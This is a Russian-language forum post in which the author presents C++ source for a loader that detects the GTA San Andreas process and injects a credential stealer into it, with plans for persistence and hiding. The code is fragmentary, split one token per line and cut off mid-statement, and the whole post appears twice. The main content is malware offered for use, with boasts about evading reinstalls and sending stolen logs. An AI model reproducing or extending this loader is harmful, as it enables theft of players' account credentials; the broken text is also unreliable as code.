Vadim.dll
09.05.2019, 20:13
Тема создана в целях познания. Делал чисто из-за того, чтобы получить опыт.
Сделал .exe загрузчик стиллера, который следит за процессом гта са и если таковой имеется, вшивает туда стиллер.
C++:
[CODE]
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//Library needed by Linker to check file existance
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "WinInet.lib")
#pragma comment (lib, "urlmon.lib")
using
namespace
std
;
DWORD
GetProcId
(
const
wchar_t
*
procname
)
{
PROCESSENTRY32 pe
;
HANDLE hSnap
;
pe
.
dwSize
=
sizeof
(
PROCESSENTRY32
)
;
hSnap
=
CreateToolhelp32Snapshot
(
TH32CS_SNAPPROCESS
,
NULL
)
;
if
(
Process32First
(
hSnap
,
&
pe
)
)
{
do
{
if
(
wcscmp
(
pe
.
szExeFile
,
procname
)
==
0
)
return
pe
.
th32ProcessID
;
;
}
while
(
Process32Next
(
hSnap
,
&
pe
)
)
;
}
return
(
DWORD
)
0
;
}
bool
InjectDLL
(
const
int
&
pid
,
const
string
&
DLL_Path
)
{
long
dll_size
=
DLL_Path
.
length
(
)
+
1
;
HANDLE hProc
=
OpenProcess
(
PROCESS_ALL_ACCESS
,
FALSE
,
pid
)
;
if
(
hProc
==
NULL
)
{
cerr
Палится антистиллером от даркпискеля. Плюсы здесь в том, что стиллер работает на чистой gta_sa без всяких asi_loader, sampfuncs. Еще плюс в том, что если юзер снесет гта и поставит заново, стиллер продолжит работать. Плюс отправляет логи уже после того, как юзер закрывает гта. Также модернизировал немного паблик аси стиллер, чтобы логи складировал в txt файл и удалил лишнюю шнягу. Исходники тоже могу скинуть, кому интересно. Работает на R1/R2. Для R3 оффсеты не смог извлечь из игры т.к я баран.
P.S Не мешало бы доделать, чтобы он прятался тоже где-то в temp папке и сам себя добавил в автозагрузку
P.S.S И вообще, можно ведь сделать .exe стиллер не вшивая .asi стиллер в игру, а напрямую взаимодействуя с процессом
Вопрос к знающим, если я записываю путь к temp папке в char, а не WCHAR, значит ли это, что если у юзера в пути к temp папке содержатся русские символы, то будет беда?
Сделал .exe загрузчик стиллера, который следит за процессом гта са и если таковой имеется, вшивает туда стиллер.
C++:
[CODE]
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//Library needed by Linker to check file existance
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "WinInet.lib")
#pragma comment (lib, "urlmon.lib")
using
namespace
std
;
DWORD
GetProcId
(
const
wchar_t
*
procname
)
{
PROCESSENTRY32 pe
;
HANDLE hSnap
;
pe
.
dwSize
=
sizeof
(
PROCESSENTRY32
)
;
hSnap
=
CreateToolhelp32Snapshot
(
TH32CS_SNAPPROCESS
,
NULL
)
;
if
(
Process32First
(
hSnap
,
&
pe
)
)
{
do
{
if
(
wcscmp
(
pe
.
szExeFile
,
procname
)
==
0
)
return
pe
.
th32ProcessID
;
;
}
while
(
Process32Next
(
hSnap
,
&
pe
)
)
;
}
return
(
DWORD
)
0
;
}
bool
InjectDLL
(
const
int
&
pid
,
const
string
&
DLL_Path
)
{
long
dll_size
=
DLL_Path
.
length
(
)
+
1
;
HANDLE hProc
=
OpenProcess
(
PROCESS_ALL_ACCESS
,
FALSE
,
pid
)
;
if
(
hProc
==
NULL
)
{
cerr
Палится антистиллером от даркпискеля. Плюсы здесь в том, что стиллер работает на чистой gta_sa без всяких asi_loader, sampfuncs. Еще плюс в том, что если юзер снесет гта и поставит заново, стиллер продолжит работать. Плюс отправляет логи уже после того, как юзер закрывает гта. Также модернизировал немного паблик аси стиллер, чтобы логи складировал в txt файл и удалил лишнюю шнягу. Исходники тоже могу скинуть, кому интересно. Работает на R1/R2. Для R3 оффсеты не смог извлечь из игры т.к я баран.
P.S Не мешало бы доделать, чтобы он прятался тоже где-то в temp папке и сам себя добавил в автозагрузку
P.S.S И вообще, можно ведь сделать .exe стиллер не вшивая .asi стиллер в игру, а напрямую взаимодействуя с процессом
Вопрос к знающим, если я записываю путь к temp папке в char, а не WCHAR, значит ли это, что если у юзера в пути к temp папке содержатся русские символы, то будет беда?